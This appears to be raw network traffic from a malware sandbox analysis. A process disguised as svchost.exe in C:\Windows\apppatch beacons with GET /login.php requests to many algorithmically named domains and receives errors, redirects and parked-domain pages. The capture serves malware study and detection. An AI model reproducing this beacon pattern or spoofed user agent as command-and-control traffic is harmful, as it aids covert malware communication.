                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Sep 8, 2024 09:00:13.127727985 CEST | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 54051 | 178.162.203.226 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:12.911328077 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 54052 | 188.114.96.3 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:14.736706972 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 54053 | 3.64.163.50 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:14.987425089 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
Sep 8, 2024 09:00:18.602668047 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 54054 | 199.191.50.83 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:15.050230026 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 54055 | 188.114.96.3 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:19.088488102 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Sep 8, 2024 09:00:20.346888065 CEST | 795 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPZoApwY5XQtG%2BfumDCZSMgxtSb0w%2BaOzfA4IORe9LhMbSIZCZ7zPqHffkyHqMIQGDMz8cLc2Cl740uN%2BKLBcluP0l2bbHQWNOeL%2Fh%2Fl9SCD4W4sZOmoWQwzWC8p3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f95effe438e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 09:00:22.047838926 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Sep 8, 2024 09:00:22.419481039 CEST | 622 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqZdfLzOkuVM3N9spqcCP2utkFahnyvVllK%2BG3y8NLXCs%2FH9P303%2F2FMhUW%2FauQ%2FysSZRVArpktXFlAJtx59Ps7vwIljsnwWl0yjJEWXcrMtOafZONFujiaY7NQ2PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0fa61ab3438e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
Sep 8, 2024 09:00:22.514379025 CEST | 173 | IN
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 54056 | 103.150.11.230 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:19.316461086 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Sep 8, 2024 09:00:20.656668901 CEST | 402 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Sep 8, 2024 09:00:21.692056894 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Sep 8, 2024 09:00:22.196717024 CEST | 402 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 54058 | 47.103.150.18 | 8001 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:20.664362907 CEST | 288 | OUT | GET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive
Sep 8, 2024 09:00:21.690274000 CEST | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:22.197593927 CEST | 288 | OUT | GET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive
Sep 8, 2024 09:00:22.573787928 CEST | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 54060 | 103.224.182.252 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:25.160104036 CEST | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
Sep 8, 2024 09:00:25.769872904 CEST | 242 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 54061 | 103.224.212.108 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:25.218373060 CEST | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
Sep 8, 2024 09:00:25.855016947 CEST | 244 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 54062 | 154.85.183.50 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:25.227638960 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Sep 8, 2024 09:00:26.124829054 CEST | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Sep 8, 2024 09:00:26.142214060 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Sep 8, 2024 09:00:26.452591896 CEST | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 54063 | 64.190.63.136 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:25.778904915 CEST | 348 | OUT | GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
Sep 8, 2024 09:00:26.475111961 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_M5BqbZPp+vENr8zESfPyY+04ztHDHvxZu+5Nln9IXdhUZ9ZLLpgvh4qJ+8sYoeqEcGQYinx7v2acEmyNRrpPbg==
                                                                                                                                                                                                            last-modified: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7768d5b45d-mmf8l
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_M5BqbZPp+vENr8zESfPyY+04ztHDHvxZu+5Nln9IXdhUZ9ZLLpgvh4qJ+8sYoeqEcGQYinx7v2acEmyNRrpPbg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475127935 CEST224INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h595as it all. We hope you find what you are searching for!"><link rel="ico
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475147963 CEST1236INData Raw: 6e 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65
                                                                                                                                                                                                            Data Ascii: n" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webki
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475161076 CEST1236INData Raw: 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c
                                                                                                                                                                                                            Data Ascii: nput{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webk1B4Eit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475171089 CEST1236INData Raw: 25 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63
                                                                                                                                                                                                            Data Ascii: %);text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buy
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475187063 CEST1236INData Raw: 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74
                                                                                                                                                                                                            Data Ascii: nline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.contain
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475200891 CEST1236INData Raw: 30 2c 32 30 30 2c 32 30 30 2c 2e 37 35 29 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73
                                                                                                                                                                                                            Data Ascii: 0,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:i
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475239992 CEST1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65
                                                                                                                                                                                                            Data Ascii: background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#f
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475260973 CEST1236INData Raw: 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32
                                                                                                                                                                                                            Data Ascii: f}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relative;height:100%;max-width:1700px;margin:
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475275993 CEST131INData Raw: 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                            Data Ascii: ontent--twot .container-content__left{background-position-y:top}.container-content--twot .container-content__right{background-pos
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481081009 CEST1236INData Raw: 35 37 31 0d 0a 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                                                                                                                                                            Data Ascii: 571ition-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
58          192.168.2.4  54064        199.59.243.226  80                7524  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 09:00:25.874661922 CEST  350                OUT        GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
Sep 8, 2024 09:00:26.336908102 CEST  1236               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1226
                                                                                                                                                                                                            x-request-id: b34072de-3677-4c6c-928d-903add77e9d5
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
